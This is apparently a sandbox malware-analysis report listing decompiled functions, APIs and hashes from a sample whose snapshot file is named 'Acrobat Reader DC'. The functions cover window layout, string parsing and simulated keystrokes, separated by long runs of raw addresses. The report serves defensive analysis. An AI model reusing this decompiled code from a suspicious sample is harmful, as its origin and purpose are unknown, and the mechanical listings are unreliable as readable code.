                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                  • String ID:
                                  • API String ID: 1957940570-0
                                  • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                  • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                                  • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                  • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0043028B Relevance: 9.3, APIs: 6, Instructions: 255COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 88%
                                  			E0043028B(signed int _a4, int _a8, signed int _a12) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				struct tagRECT _v40;
				struct tagRECT _v56;
				signed int _t161;
				int _t182;
				signed int _t217;
				signed int _t218;
				signed int _t219;
				signed int _t221;
				struct HWND__* _t223;
				long _t225;
				struct HWND__* _t226;
				signed int _t228;
				signed int _t243;
				struct HWND__* _t244;
				signed int _t251;
				struct HWND__* _t252;
				struct HWND__* _t256;
				struct HWND__** _t265;
				struct HWND__* _t266;
				struct HWND__** _t275;

				_t275 = _a8;
				_t265 = _a4;
				if(_t265[0xe] == 0) {
					_a8 = _t275[0x1f] & 0x0000ffff;
					GetClientRect( *_t265,  &_v56);
					_t161 = _v56.right;
					_t243 = _v56.bottom;
					_t223 = _t265[0x11];
					_t218 = _t265[0x12];
					_a12 = _t161;
					_v24 = _t243;
					_a4 = _t223;
					_v12 = _t218;
					if(_t161 == 0) {
						_a12 = 1;
						if(_t223 != 0) {
							_a12 = _t223;
						}
					}
					if(_t243 == 0) {
						_v24 = 1;
						if(_t218 != 0) {
							_v24 = _t218;
						}
					}
					if(_t265[0x68] != 0) {
						_t218 = _t218 - GetSystemMetrics(0xf);
						_v12 = _t218;
					}
					GetWindowRect( *_t275,  &_v56);
					_t225 = _v56.left;
					_t244 = _v56.top;
					_v16 = _v56.right - _t225;
					_v40.bottom = _t244;
					_v20 = _v56.bottom - _t244;
					_v40.right.x = _t225;
					ScreenToClient( *_t265,  &(_v40.right));
					_t226 = _v40.right.x;
					asm("cdq");
					_t266 = _v40.bottom;
					_t275[0x20] = _t226 * _a4 / _a12;
					asm("cdq");
					_t219 = _v24;
					_t275[0x20] = _t266 * _t218 / _v24;
					asm("cdq");
					_t275[0x21] = _v16 * _a4 / _a12;
					asm("cdq");
					_t275[0x21] = _v20 * _v12 / _t219;
					_t182 = _a8;
					if(_t182 == 0) {
						goto L48;
					} else {
						if((_t182 & 0x00000100) != 0) {
							_t256 = _v16;
							_t275[0x21] = _t256;
							if((_t182 & 0x00000006) == 0) {
								if((_t182 & 0x00000008) == 0) {
									asm("cdq");
									if(_t226 > _a12 - _t256 >> 1) {
										_t220 = _a12;
										asm("cdq");
										_t219 = _v24;
										_t275[0x20] = (_t226 - _a12 + _v16) * _a4 / _t220 - _v16 + _a4;
									}
								} else {
									asm("cdq");
									_t275[0x20] = _t226 - (_a4 - _a12 - _t256 >> 1);
								}
								_t182 = _a8;
							}
						}
						if((_t182 & 0x00000200) != 0) {
							_t252 = _v20;
							_t275[0x21] = _t252;
							if((_t182 & 0x00000060) == 0) {
								if(_t182 >= 0) {
									asm("cdq");
									if(_t266 > _t219 - _t252 >> 1) {
										asm("cdq");
										_t275[0x20] = (_t266 - _t219 + _v20) * _v12 / _t219 - _v20 + _v12;
									}
								} else {
									asm("cdq");
									_t275[0x20] = _t266 - (_v12 - _t219 - _t252 >> 1);
								}
								_t182 = _a8;
							}
						}
						_t251 = _t182 & 0x00000002;
						if(_t251 != 0) {
							_t275[0x20] = _t226;
						}
						if((_t182 & 0x00000004) != 0) {
							if(_t251 == 0) {
								_t275[0x20] = _t226 - _a12 - _t275[0x21] + _a4 + _v16;
							} else {
								_t275[0x21] = _t226 - _t275[0x20] - _a12 + _a4 + _v16;
							}
						}
						_t228 = _t182 & 0x00000020;
						if(_t228 != 0) {
							_t275[0x20] = _t266;
						}
						if((_t182 & 0x00000040) == 0) {
							goto L48;
						} else {
							if(_t228 == 0) {
								_t275[0x20] = _t266 - _t275[0x21] - _t219 + _v12 + _v20;
								return _t182;
							}
							_t275[0x21] = _t266 - _t275[0x20] - _t219 + _v12 + _v20;
							return _t182;
						}
					}
				} else {
					_t275[0x20] = _t265[0x16];
					_t275[0x20] = _t265[0x17];
					if(_t275[0x22] != 7 || _a12 != 0) {
						_t275[0x21] = _t265[0x18];
						_t275[0x21] = _t265[0x19];
					}
					GetClientRect( *_t275,  &_v40);
					_t221 = _t217 | 0xffffffff;
					if(_t265[0x16] == _t221) {
						_t275[0x20] = _v40.left;
					}
					if(_t265[0x17] == _t221) {
						_t275[0x20] = _v40.top;
					}
					_t182 = GetWindowRect( *_t275,  &_v40);
					if(_t265[0x18] == _t221) {
						_t275[0x21] = _v40.right.x - _v40.left;
					}
					if(_t265[0x19] == _t221 || _t275[0x22] == 0) {
						_t275[0x21] = _v40.bottom - _v40.top;
						return _t182;
					} else {
						L48:
						return _t182;
					}
				}
			}



























                                  0x00430293
                                  0x00430297
                                  0x0043029e
                                  0x00430361
                                  0x00430364
                                  0x0043036a
                                  0x0043036d
                                  0x00430370
                                  0x00430373
                                  0x00430376
                                  0x00430379
                                  0x0043037c
                                  0x0043037f
                                  0x00430384
                                  0x00430386
                                  0x0043038f
                                  0x00430391
                                  0x00430391
                                  0x0043038f
                                  0x00430396
                                  0x00430398
                                  0x004303a1
                                  0x004303a3
                                  0x004303a3
                                  0x004303a1
                                  0x004303ad
                                  0x004303b7
                                  0x004303b9
                                  0x004303b9
                                  0x004303c3
                                  0x004303c9
                                  0x004303cf
                                  0x004303d4
                                  0x004303dc
                                  0x004303e2
                                  0x004303e9
                                  0x004303ec
                                  0x004303f2
                                  0x004303fb
                                  0x004303ff
                                  0x00430402
                                  0x0043040e
                                  0x00430412
                                  0x00430415
                                  0x00430423
                                  0x00430427
                                  0x00430435
                                  0x00430438
                                  0x0043043f
                                  0x00430445
                                  0x00000000
                                  0x0043044b
                                  0x00430450
                                  0x00430452
                                  0x00430456
                                  0x0043045f
                                  0x00430463
                                  0x00430480
                                  0x00430487
                                  0x00430489
                                  0x00430497
                                  0x0043049a
                                  0x004304a3
                                  0x004304a3
                                  0x00430465
                                  0x0043046b
                                  0x00430474
                                  0x00430474
                                  0x004304aa
                                  0x004304aa
                                  0x0043045f
                                  0x004304b2
                                  0x004304b4
                                  0x004304b8
                                  0x004304c1
                                  0x004304c5
                                  0x004304e0
                                  0x004304e7
                                  0x004304f4
                                  0x004304fd
                                  0x004304fd
                                  0x004304c7
                                  0x004304cc
                                  0x004304d5
                                  0x004304d5
                                  0x00430504
                                  0x00430504
                                  0x004304c1
                                  0x00430509
                                  0x0043050c
                                  0x0043050e
                                  0x0043050e
                                  0x00430517
                                  0x0043051c
                                  0x0043054c
                                  0x0043051e
                                  0x00430531
                                  0x00430531
                                  0x0043051c
                                  0x00430555
                                  0x00430558
                                  0x0043055a
                                  0x0043055a
                                  0x00430563
                                  0x00000000
                                  0x00430565
                                  0x00430568
                                  0x0043059e
                                  0x00000000
                                  0x0043059e
                                  0x0043057c
                                  0x00430589
                                  0x00430589
                                  0x00430563
                                  0x004302a4
                                  0x004302af
                                  0x004302ba
                                  0x004302c1
                                  0x004302cd
                                  0x004302d8
                                  0x004302d8
                                  0x004302e6
                                  0x004302ec
                                  0x004302f2
                                  0x004302f8
                                  0x004302f8
                                  0x00430302
                                  0x00430308
                                  0x00430308
                                  0x00430316
                                  0x0043031f
                                  0x00430327
                                  0x00430327
                                  0x00430331
                                  0x00430346
                                  0x00430353
                                  0x004305ab
                                  0x004305ab
                                  0x004305ab
                                  0x004305ab
                                  0x00430331

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Rect$Client$Window$MetricsScreenSystem
                                  • String ID:
                                  • API String ID: 3220332590-0
                                  • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                  • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                                  • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                  • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00444BFC Relevance: 9.2, APIs: 6, Instructions: 163COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00444BFC(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a15) {
				char _v12;
				void* __edi;
				signed int _t47;
				signed int _t49;
				signed int _t50;
				signed int _t62;
				signed int _t64;
				signed int _t69;
				signed int _t76;
				signed int _t77;
				signed int _t79;
				signed int _t80;
				signed int _t81;
				signed int _t82;
				signed int _t83;
				intOrPtr _t85;
				signed int _t88;
				intOrPtr _t90;
				intOrPtr _t93;
				intOrPtr _t94;
				void* _t96;
				void* _t97;
				void* _t98;
				void* _t99;

				_t94 = _a8;
				_t93 = _a12;
				_t47 = 0;
				while(1) {
					_t80 =  *(_t94 + _t47 * 2) & 0x0000ffff;
					if(_t80 != 0x20 && _t80 != 9) {
						break;
					}
					_t47 = _t47 + 1;
				}
				_t81 =  *(_t94 + _t47 * 2) & 0x0000ffff;
				__eflags = _t81 - 0x22;
				if(_t81 != 0x22) {
					__eflags = _t81 - 0x27;
					if(_t81 != 0x27) {
						__eflags = _t81 - 0x3c;
						if(_t81 != 0x3c) {
							goto L29;
						} else {
							_t9 = _t81 + 2; // 0x2
							_t88 = _t9;
							_a15 = 0;
							goto L10;
						}
					} else {
						_t88 = _t81;
						_a15 = 1;
						goto L10;
					}
				} else {
					_t88 = _t81;
					_a15 = 1;
					L10:
					_t82 =  *(_t94 + 2 + _t47 * 2) & 0x0000ffff;
					_t49 = _t47 + 1;
					_t76 = 0;
					__eflags = _t82 - _t88;
					if(_t82 != _t88) {
						while(1) {
							__eflags = _t82;
							if(_t82 == 0) {
								goto L13;
							}
							_t49 = _t49 + 1;
							 *(_t93 + _t76 * 2) = _t82;
							_t82 =  *(_t94 + _t49 * 2) & 0x0000ffff;
							_t76 = _t76 + 1;
							__eflags = _t82 - _t88;
							if(_t82 != _t88) {
								continue;
							}
							goto L13;
						}
					}
					L13:
					__eflags =  *(_t94 + _t49 * 2) - _t88;
					if( *(_t94 + _t49 * 2) != _t88) {
						L29:
						__eflags = 0;
						return 0;
					} else {
						goto L14;
						do {
							do {
								L14:
								_t83 =  *(_t94 + 2 + _t49 * 2) & 0x0000ffff;
								_t49 = _t49 + 1;
								__eflags = _t83 - 0x20;
							} while (_t83 == 0x20);
							__eflags = _t83 - 9;
						} while (_t83 == 9);
						_t50 =  *(_t94 + _t49 * 2) & 0x0000ffff;
						__eflags = _t50;
						if(__eflags == 0) {
							L18:
							 *(_t93 + _t76 * 2) = 0;
							E0043652F(__eflags,  &_v12, E00410160(_t93, __eflags));
							_t95 = _v12;
							E00444B5F( &_v12, _v12);
							E00444BBB( &_v12, __eflags, _v12);
							__eflags = _a15;
							if(_a15 == 0) {
								_t85 = _a4;
								_t77 = 0;
								__eflags =  *(_t85 + 0x3c);
								if( *(_t85 + 0x3c) > 0) {
									while(1) {
										E00411567(_t93,  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x38)) + _t77 * 4)));
										E00411536(_t93, _t95);
										_t62 = E004339FA(_t93);
										_t97 = _t96 + 0x14;
										__eflags = _t62;
										if(_t62 != 0) {
											goto L28;
										}
										E00411567(_t93, _t95);
										_t90 = _a4;
										_t77 = _t77 + 1;
										_t96 = _t97 + 8;
										__eflags = _t77 -  *((intOrPtr*)(_t90 + 0x3c));
										if(_t77 <  *((intOrPtr*)(_t90 + 0x3c))) {
											continue;
										}
										goto L28;
									}
								}
								goto L28;
							} else {
								_t64 = E004339FA(_t93);
								_t98 = _t96 + 4;
								__eflags = _t64;
								if(_t64 == 0) {
									_t79 =  *((intOrPtr*)(_a4 + 0x3c)) - 1;
									__eflags = _t79;
									if(_t79 < 0) {
										L28:
										E00436508( &_v12);
										return 1;
									} else {
										while(1) {
											E00411567(_t93,  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x38)) + _t79 * 4)));
											E00411536(_t93, _t95);
											_t69 = E004339FA(_t93);
											_t99 = _t98 + 0x14;
											__eflags = _t69;
											if(_t69 != 0) {
												goto L28;
											}
											E00411567(_t93, _t95);
											_t98 = _t99 + 8;
											_t79 = _t79 - 1;
											__eflags = _t79;
											if(_t79 >= 0) {
												continue;
											} else {
												E00436508( &_v12);
												return 1;
											}
											goto L30;
										}
										goto L28;
									}
								} else {
									E00436508( &_v12);
									return 1;
								}
							}
						} else {
							__eflags = _t50 - 0x3b;
							if(__eflags != 0) {
								goto L29;
							} else {
								goto L18;
							}
						}
					}
				}
				L30:
			}



























                                  0x00444c04
                                  0x00444c08
                                  0x00444c0b
                                  0x00444c0d
                                  0x00444c0d
                                  0x00444c14
                                  0x00000000
                                  0x00000000
                                  0x00444c1b
                                  0x00444c1b
                                  0x00444c1e
                                  0x00444c22
                                  0x00444c25
                                  0x00444c2f
                                  0x00444c32
                                  0x00444c3c
                                  0x00444c3f
                                  0x00000000
                                  0x00444c45
                                  0x00444c45
                                  0x00444c45
                                  0x00444c48
                                  0x00000000
                                  0x00444c48
                                  0x00444c34
                                  0x00444c34
                                  0x00444c36
                                  0x00000000
                                  0x00444c36
                                  0x00444c27
                                  0x00444c27
                                  0x00444c29
                                  0x00444c4c
                                  0x00444c4c
                                  0x00444c51
                                  0x00444c52
                                  0x00444c54
                                  0x00444c57
                                  0x00444c59
                                  0x00444c59
                                  0x00444c5c
                                  0x00000000
                                  0x00000000
                                  0x00444c5e
                                  0x00444c5f
                                  0x00444c63
                                  0x00444c67
                                  0x00444c68
                                  0x00444c6b
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00444c6b
                                  0x00444c59
                                  0x00444c6d
                                  0x00444c6d
                                  0x00444c71
                                  0x00444d8d
                                  0x00444d8d
                                  0x00444d93
                                  0x00444c77
                                  0x00000000
                                  0x00444c77
                                  0x00444c77
                                  0x00444c77
                                  0x00444c77
                                  0x00444c7c
                                  0x00444c7d
                                  0x00444c7d
                                  0x00444c82
                                  0x00444c82
                                  0x00444c87
                                  0x00444c8b
                                  0x00444c8e
                                  0x00444c99
                                  0x00444c9b
                                  0x00444ca9
                                  0x00444cae
                                  0x00444cb2
                                  0x00444cb8
                                  0x00444cbd
                                  0x00444cc1
                                  0x00444d36
                                  0x00444d39
                                  0x00444d3b
                                  0x00444d3e
                                  0x00444d40
                                  0x00444d4b
                                  0x00444d52
                                  0x00444d58
                                  0x00444d5d
                                  0x00444d60
                                  0x00444d62
                                  0x00000000
                                  0x00000000
                                  0x00444d66
                                  0x00444d6b
                                  0x00444d6e
                                  0x00444d6f
                                  0x00444d72
                                  0x00444d75
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00444d75
                                  0x00444d40
                                  0x00000000
                                  0x00444cc3
                                  0x00444cc4
                                  0x00444cc9
                                  0x00444ccc
                                  0x00444cce
                                  0x00444cea
                                  0x00444cea
                                  0x00444ceb
                                  0x00444d77
                                  0x00444d7b
                                  0x00444d88
                                  0x00444cf1
                                  0x00444cf1
                                  0x00444cfc
                                  0x00444d03
                                  0x00444d09
                                  0x00444d0e
                                  0x00444d11
                                  0x00444d13
                                  0x00000000
                                  0x00000000
                                  0x00444d17
                                  0x00444d1c
                                  0x00444d1f
                                  0x00444d1f
                                  0x00444d20
                                  0x00000000
                                  0x00444d22
                                  0x00444d26
                                  0x00444d33
                                  0x00444d33
                                  0x00000000
                                  0x00444d20
                                  0x00000000
                                  0x00444cf1
                                  0x00444cd0
                                  0x00444cd4
                                  0x00444ce1
                                  0x00444ce1
                                  0x00444cce
                                  0x00444c90
                                  0x00444c90
                                  0x00444c93
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00444c93
                                  0x00444c8e
                                  0x00444c71
                                  0x00000000

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _wcscpy$_wcscat
                                  • String ID:
                                  • API String ID: 2037614760-0
                                  • Opcode ID: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                  • Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
                                  • Opcode Fuzzy Hash: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                  • Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044C514 Relevance: 9.2, APIs: 6, Instructions: 163windowkeyboardCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 93%
                                  			E0044C514(signed char _a4, signed int _a8) {
				signed short _v8;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v30;
				short _v32;
				long _v36;
				char _v292;
				signed int _t40;
				signed char _t58;
				signed char _t67;
				signed char _t79;
				struct HWND__* _t80;
				long _t83;
				void* _t85;

				_t67 = _a4;
				_t80 =  *(_t67 + 0x20);
				_t79 = _a8;
				_t40 =  *_t79;
				_a8 = _t40;
				_a4 =  *((intOrPtr*)(_t79 + 7));
				_v8 =  *(_t79 + 8) & 0x0000ffff;
				if(_t80 == 0 || _t40 == 0x14 || _t40 == 0x90 || _t40 == 0x91) {
					if(E0043487C(_t79) == 0) {
						_v30 = _v8;
						_v36 = 1;
						_v32 = 0;
						_v28 = 4;
						_v24 = 0;
						_v20 = 0;
						__imp__SendInput(1,  &_v36, 0x1c);
						return E0043477C(_t67);
					} else {
						if(E00444980(_t79) != 1) {
							E0043471D(_t67, _a8, _a4, 0);
							return E0043477C(_t67);
						} else {
							E0043471D(_t67, _a8, _a4, 1);
							return E0043477C(_t67);
						}
					}
				} else {
					if(E0043487C(_t79) == 0) {
						PostMessageW(_t80, 0x102, _v8 & 0x0000ffff, 1);
						return E0043477C(_t67);
					} else {
						if(GetKeyboardState( &_v292) != 0) {
							 *(_t85 + (_a8 & 0x000000ff) - 0x120) =  *(_t85 + (_a8 & 0x000000ff) - 0x120) | 0x00000080;
							SetKeyboardState( &_v292);
						}
						_t83 = (_a4 & 0x000000ff) << 0x00000010 | 0x00000001;
						if(E00444980(_t79) == 1) {
							_t83 = _t83 | 0x01000000;
						}
						if( *((char*)(_t67 + 0x17)) != 0 ||  *((char*)(_t67 + 0x1d)) != 0) {
							_t58 = _a8;
							goto L14;
						} else {
							_t58 = _a8;
							if(_t58 == 0x12) {
								L14:
								if( *((char*)(_t67 + 0x16)) != 0 ||  *((char*)(_t67 + 0x1c)) != 0) {
									goto L12;
								} else {
									PostMessageW( *(_t67 + 0x20), 0x104, _t58 & 0x000000ff, _t83 | 0x20000000);
									return E0043477C(_t67);
								}
							} else {
								L12:
								PostMessageW( *(_t67 + 0x20), 0x100, _t58 & 0x000000ff, _t83);
								return E0043477C(_t67);
							}
						}
					}
				}
			}


















                                  0x0044c51e
                                  0x0044c522
                                  0x0044c526
                                  0x0044c52d
                                  0x0044c532
                                  0x0044c535
                                  0x0044c538
                                  0x0044c53d
                                  0x0044c64c
                                  0x0044c69f
                                  0x0044c6aa
                                  0x0044c6b1
                                  0x0044c6b5
                                  0x0044c6bc
                                  0x0044c6bf
                                  0x0044c6c2
                                  0x0044c6d4
                                  0x0044c64e
                                  0x0044c656
                                  0x0044c682
                                  0x0044c693
                                  0x0044c658
                                  0x0044c663
                                  0x0044c674
                                  0x0044c674
                                  0x0044c656
                                  0x0044c55b
                                  0x0044c563
                                  0x0044c62f
                                  0x0044c641
                                  0x0044c569
                                  0x0044c578
                                  0x0044c57e
                                  0x0044c594
                                  0x0044c594
                                  0x0044c5a2
                                  0x0044c5ac
                                  0x0044c5ae
                                  0x0044c5ae
                                  0x0044c5b8
                                  0x0044c5ea
                                  0x00000000
                                  0x0044c5c0
                                  0x0044c5c0
                                  0x0044c5c5
                                  0x0044c5ed
                                  0x0044c5f1
                                  0x00000000
                                  0x0044c5f9
                                  0x0044c60d
                                  0x0044c61f
                                  0x0044c61f
                                  0x0044c5c7
                                  0x0044c5c7
                                  0x0044c5d5
                                  0x0044c5e7
                                  0x0044c5e7
                                  0x0044c5c5
                                  0x0044c5b8
                                  0x0044c563

                                  APIs
                                  • GetKeyboardState.USER32(?), ref: 0044C570
                                  • SetKeyboardState.USER32(00000080), ref: 0044C594
                                  • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                                  • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                                  • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                                  • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: MessagePost$KeyboardState$InputSend
                                  • String ID:
                                  • API String ID: 2221674350-0
                                  • Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                  • Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
                                  • Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                  • Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00451B42 Relevance: 9.1, APIs: 6, Instructions: 144memoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 63%
                                  			E00451B42(intOrPtr* _a4, signed short* _a8, signed short* _a12, char _a16, char _a20) {
				signed short _v16;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v40;
				char _v56;
				char _v72;
				void* __edi;
				void* __esi;
				intOrPtr _t61;
				long _t65;
				intOrPtr _t70;
				intOrPtr _t72;
				intOrPtr _t86;
				signed short* _t87;
				intOrPtr* _t93;
				intOrPtr _t99;
				intOrPtr _t101;
				signed int _t104;
				intOrPtr _t107;
				intOrPtr _t108;
				intOrPtr* _t115;
				signed short* _t116;
				signed int _t120;

				_t87 = _a8;
				_t116 = _a12;
				_v40 = 0;
				_v32 = 1;
				_v28 = 0;
				_a12 = _t87;
				if( *0x4a7f19 == 0) {
					L14:
					E00403C90( *((intOrPtr*)( *_a4 + 4)) + _a4, _t87, 0);
					__eflags = _a20;
					if(_a20 == 0) {
						goto L13;
					} else {
						E00408F40(_t115,  &_v40);
						return 1;
					}
				} else {
					_t61 =  *0x4a7f1c; // 0x0
					if(_t61 == 0) {
						goto L14;
					} else {
						if( *((char*)(_t61 + 0x40)) == 0) {
							 *((short*)(_t61 + 0x48)) = 3;
							 *((intOrPtr*)(_t61 + 0x50)) = _t87;
							 *((short*)(_t61 + 0xa8)) = 3;
							_t65 = GetLastError();
							_t107 =  *0x4a7f1c; // 0x0
							 *(_t107 + 0xb0) = _t65;
							 *((short*)(_t107 + 0xb8)) = 3;
							 *((intOrPtr*)(_t107 + 0xc0)) = E004348AA( *((intOrPtr*)(_a4 + 0xf4)));
							if(_t116 != 0) {
								_t115 = __imp__#10;
								_v24 = 8;
								_v16 = _t116[2];
								 *_t115(_t107 + 0x78,  &_v24);
								_t99 =  *0x4a7f1c; // 0x0
								_v16 = _t116[4];
								 *_t115(_t99 + 0x68,  &_v24);
								_t101 =  *0x4a7f1c; // 0x0
								_v16 = _t116[6];
								 *_t115(_t101 + 0x88,  &_v24);
								_t86 =  *0x4a7f1c; // 0x0
								 *((short*)(_t86 + 0x98)) = 3;
								 *(_t86 + 0xa0) = _t116[8];
								 *((short*)(_t86 + 0xc8)) = 3;
								_t104 =  *_t116 & 0x0000ffff;
								if(_t104 == 0) {
									_t120 = _t116[0xe];
								} else {
									_t120 = _t104;
								}
								 *(_t86 + 0xd0) = _t120;
								_t126 = _t120;
								if(_t120 != 0) {
									_a12 = _t120;
								}
							}
							E0040BC70( &_v56, _t126);
							if(_a16 == 0) {
								E0040E0A0( &_v56, E0044AF6C( &_v72, _a12));
								E00402250( &_v72);
								_a16 = _v56;
							}
							_t70 =  *0x4a7f1c; // 0x0
							__imp__#9(_t70 + 0x58);
							_t72 = _a16;
							_t108 =  *0x4a7f1c; // 0x0
							 *((short*)(_t108 + 0x58)) = 8;
							__imp__#2(_t72);
							_t93 =  *0x4a7f1c; // 0x0
							 *((intOrPtr*)(_t93 + 0x60)) = _t72;
							 *((intOrPtr*)( *((intOrPtr*)( *_t93 + 0x20))))();
							E00402250( &_v56);
						}
						E00403C90( *((intOrPtr*)( *_a4 + 4)) + _a4, _t87, 0);
						L13:
						E00408F40(_t115,  &_v40);
						return 0;
					}
				}
			}



























                                  0x00451b50
                                  0x00451b54
                                  0x00451b58
                                  0x00451b5f
                                  0x00451b66
                                  0x00451b6d
                                  0x00451b70
                                  0x00451cfd
                                  0x00451d0a
                                  0x00451d0f
                                  0x00451d13
                                  0x00000000
                                  0x00451d15
                                  0x00451d18
                                  0x00451d28
                                  0x00451d28
                                  0x00451b76
                                  0x00451b76
                                  0x00451b7d
                                  0x00000000
                                  0x00451b83
                                  0x00451b87
                                  0x00451b92
                                  0x00451b96
                                  0x00451b99
                                  0x00451ba0
                                  0x00451ba6
                                  0x00451baf
                                  0x00451bba
                                  0x00451bcd
                                  0x00451bd5
                                  0x00451bde
                                  0x00451be9
                                  0x00451bf5
                                  0x00451bf8
                                  0x00451bfa
                                  0x00451c0b
                                  0x00451c0e
                                  0x00451c10
                                  0x00451c24
                                  0x00451c27
                                  0x00451c29
                                  0x00451c33
                                  0x00451c3d
                                  0x00451c43
                                  0x00451c4a
                                  0x00451c50
                                  0x00451c56
